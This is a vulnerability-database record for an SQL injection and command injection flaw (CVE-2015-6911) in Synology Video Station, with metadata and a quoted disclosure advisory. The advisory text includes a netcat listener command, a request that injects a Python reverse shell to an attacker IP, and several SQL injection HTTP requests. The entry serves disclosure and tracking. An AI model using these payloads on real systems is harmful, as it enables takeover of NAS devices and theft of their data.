VAR-201509-0203
Vulnerability from variot - Updated: 2025-04-13 23:18SQL injection vulnerability in Synology Video Station before 1.5-0763 allows remote attackers to execute arbitrary SQL commands via the id parameter to watchstatus.cgi. Synology Video Station is a video manager from Synology. As a result it is possible to compromise the PostgreSQL database server.
Affected versions
These issues affect Synology Video Station version up to and including version 1.5-0757. The script subtitle.cgi can also be called when the 'public share' option is enabled. With this option enabled, this issue can also be exploited by an unauthenticated remote attacker. This vulnerability can be used to compromise a Synology DiskStation NAS, including all data stored on the NAS, and the NAS as stepping stone to attack other systems.
- Start netcat on attacker's system:
nc -nvlp 80
- Submit the following request (change the IP - 192.168.1.20 - & port number - 80):
GET /webapi/VideoStation/subtitle.cgi?id=193&api=SYNO.VideoStation.Subtitle&method=get&version=2&subtitle_id=%2Fvolume1%2Fvideo%2Fmr.robot.s01e10.720p.hdtv.x264-killers.nfo%2FMr.Robot.S01E10.720p.HDTV.x264-KILLERS.2aafa5c.eng.srt&subtitle_codepage=auto%26python%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.20%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5b%22/bin/sh%22,%22-i%22%5d);'%26&preview=false&sharing_id=kSiNy0Pp HTTP/1.1 Host: 192.168.1.13:5000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
SQL injection vulnerability in watchstatus.cgi
A (blind) SQL injection vulnerability exists in the watchstatus.cgi CGI script. As a result it is possible to compromise the PostgreSQL database server. In the following screenshot this issue is exploited using sqlmap.
Proof of concept
POST /webapi/VideoStation/watchstatus.cgi HTTP/1.1 Host: 192.168.1.13:5000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-SYNO-TOKEN: Lq6mE9ANV2egU X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 80 Cookie: stay_login=0; id=Lq5QWGqg7Rnzc13A0LTN001710; jwplayer.volume=50 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
id=15076178770%20or%204864%3d4864--%20&position=10.05&api=SYNO.VideoStation.WatchStatus&method=setinfo&version=1
It should be noted that the X-SYNO-TOKEN header provides protection against Cross-Site Request Forgery attacks. As of DSM version 5.2-5592 Update 3, this protection is enabled by default. As a result it is possible to compromise the PostgreSQL database server. Proof of concept
POST /webapi/VideoStation/audiotrack.cgi HTTP/1.1 Content-Length: 294 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-SYNO-TOKEN: 7IKJdJMa8cutE Host: :5000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 User-Agent: Mozilla/5.0 Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Connection: close Pragma: no-cache Cache-Control: no-cache X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: stay_login=0; id=7IivlxDM9MFb213A0LTN001710
id=1%20AND%20%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20usesuper%3Dtrue%20FROM%20pg_user%20WHERE%20usename%3DCURRENT_USER%20OFFSET%200%20LIMIT%201%29%29%20THEN%20%28CHR%2849%29%29%20ELSE%20%28CHR%2848%29%29%20END%29%29%3D%28CHR%2849%29%29&api=SYNO.VideoStation.AudioTrack&method=list&version=1
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201509-0203",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "video station",
"scope": "lte",
"trust": 1.0,
"vendor": "synology",
"version": "1.5-0757"
},
{
"model": "video station",
"scope": "lt",
"trust": 0.8,
"vendor": "synology",
"version": "1.5-0763"
},
{
"model": "video station",
"scope": "eq",
"trust": 0.6,
"vendor": "synology",
"version": "1.5-0757"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151"
},
{
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:synology:video_station",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Securify B.V., Han Sahin",
"sources": [
{
"db": "PACKETSTORM",
"id": "133519"
}
],
"trust": 0.1
},
"cve": "CVE-2015-6911",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2015-6911",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-84872",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-6911",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2015-6911",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201509-151",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-84872",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2015-6911",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84872"
},
{
"db": "VULMON",
"id": "CVE-2015-6911"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151"
},
{
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection vulnerability in Synology Video Station before 1.5-0763 allows remote attackers to execute arbitrary SQL commands via the id parameter to watchstatus.cgi. Synology Video Station is a video manager from Synology. As a result it is possible to compromise\nthe PostgreSQL database server. \n\n------------------------------------------------------------------------\nAffected versions\n------------------------------------------------------------------------\nThese issues affect Synology Video Station version up to and including\nversion 1.5-0757. The script subtitle.cgi can also be called when the \u0027public share\u0027 option is enabled. With this option enabled, this issue can also be exploited by an unauthenticated remote attacker. This vulnerability can be used to compromise a Synology DiskStation NAS, including all data stored on the NAS, and the NAS as stepping stone to attack other systems. \n\n\n- Start netcat on attacker\u0027s system:\n\nnc -nvlp 80\n\n- Submit the following request (change the IP - 192.168.1.20 - \u0026 port number - 80):\n\nGET /webapi/VideoStation/subtitle.cgi?id=193\u0026api=SYNO.VideoStation.Subtitle\u0026method=get\u0026version=2\u0026subtitle_id=%2Fvolume1%2Fvideo%2Fmr.robot.s01e10.720p.hdtv.x264-killers.nfo%2FMr.Robot.S01E10.720p.HDTV.x264-KILLERS.2aafa5c.eng.srt\u0026subtitle_codepage=auto%26python%20-c%20\u0027import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.20%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5b%22/bin/sh%22,%22-i%22%5d);\u0027%26\u0026preview=false\u0026sharing_id=kSiNy0Pp HTTP/1.1\nHost: 192.168.1.13:5000\nUser-Agent: Mozilla/5.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\n\n\n\nSQL injection vulnerability in watchstatus.cgi\n\nA (blind) SQL injection vulnerability exists in the watchstatus.cgi CGI script. As a result it is possible to compromise the PostgreSQL database server. In the following screenshot this issue is exploited using sqlmap. \n\nProof of concept\n\nPOST /webapi/VideoStation/watchstatus.cgi HTTP/1.1\nHost: 192.168.1.13:5000\nUser-Agent: Mozilla/5.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-SYNO-TOKEN: Lq6mE9ANV2egU\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nContent-Length: 80\nCookie: stay_login=0; id=Lq5QWGqg7Rnzc13A0LTN001710; jwplayer.volume=50\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\n \nid=15076178770%20or%204864%3d4864--%20\u0026position=10.05\u0026api=SYNO.VideoStation.WatchStatus\u0026method=setinfo\u0026version=1\n\nIt should be noted that the X-SYNO-TOKEN header provides protection against Cross-Site Request Forgery attacks. As of DSM version 5.2-5592 Update 3, this protection is enabled by default. As a result it is possible to compromise the PostgreSQL database server. \nProof of concept\n\nPOST /webapi/VideoStation/audiotrack.cgi HTTP/1.1\nContent-Length: 294\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-SYNO-TOKEN: 7IKJdJMa8cutE\nHost: \u003chostname\u003e:5000\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nUser-Agent: Mozilla/5.0\nAccept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7\nConnection: close\nPragma: no-cache\nCache-Control: no-cache\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: stay_login=0; id=7IivlxDM9MFb213A0LTN001710\n \nid=1%20AND%20%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20usesuper%3Dtrue%20FROM%20pg_user%20WHERE%20usename%3DCURRENT_USER%20OFFSET%200%20LIMIT%201%29%29%20THEN%20%28CHR%2849%29%29%20ELSE%20%28CHR%2848%29%29%20END%29%29%3D%28CHR%2849%29%29\u0026api=SYNO.VideoStation.AudioTrack\u0026method=list\u0026version=1\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-6911"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"db": "VULHUB",
"id": "VHN-84872"
},
{
"db": "VULMON",
"id": "CVE-2015-6911"
},
{
"db": "PACKETSTORM",
"id": "133519"
}
],
"trust": 1.89
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-84872",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=38128",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84872"
},
{
"db": "VULMON",
"id": "CVE-2015-6911"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-6911",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "133519",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004688",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "38128",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-84872",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2015-6911",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84872"
},
{
"db": "VULMON",
"id": "CVE-2015-6911"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151"
},
{
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"id": "VAR-201509-0203",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-84872"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T23:18:04.121000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Release Notes for Video Station",
"trust": 0.8,
"url": "https://www.synology.com/en-global/releaseNote/VideoStation?model=DS715"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84872"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.synology.com/en-global/releasenote/videostation?model=ds715"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2015/sep/31"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/133519/synology-video-station-1.5-0757-command-injection-sql-injection.html"
},
{
"trust": 1.8,
"url": "https://www.securify.nl/advisory/sfy20150810/synology_video_station_command_injection_and_multiple_sql_injection_vulnerabilities.html"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/archive/1/536427/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6911"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6911"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/536427/100/0/threaded"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/89.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/38128/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84872"
},
{
"db": "VULMON",
"id": "CVE-2015-6911"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151"
},
{
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-84872"
},
{
"db": "VULMON",
"id": "CVE-2015-6911"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151"
},
{
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-09-11T00:00:00",
"db": "VULHUB",
"id": "VHN-84872"
},
{
"date": "2015-09-11T00:00:00",
"db": "VULMON",
"id": "CVE-2015-6911"
},
{
"date": "2015-09-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"date": "2015-09-10T00:05:25",
"db": "PACKETSTORM",
"id": "133519"
},
{
"date": "2015-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-151"
},
{
"date": "2015-09-11T16:59:17.533000",
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-84872"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULMON",
"id": "CVE-2015-6911"
},
{
"date": "2015-09-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-004688"
},
{
"date": "2015-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-151"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2015-6911"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Synology Video Station In SQL Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004688"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "sql injection",
"sources": [
{
"db": "PACKETSTORM",
"id": "133519"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-151"
}
],
"trust": 0.7
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…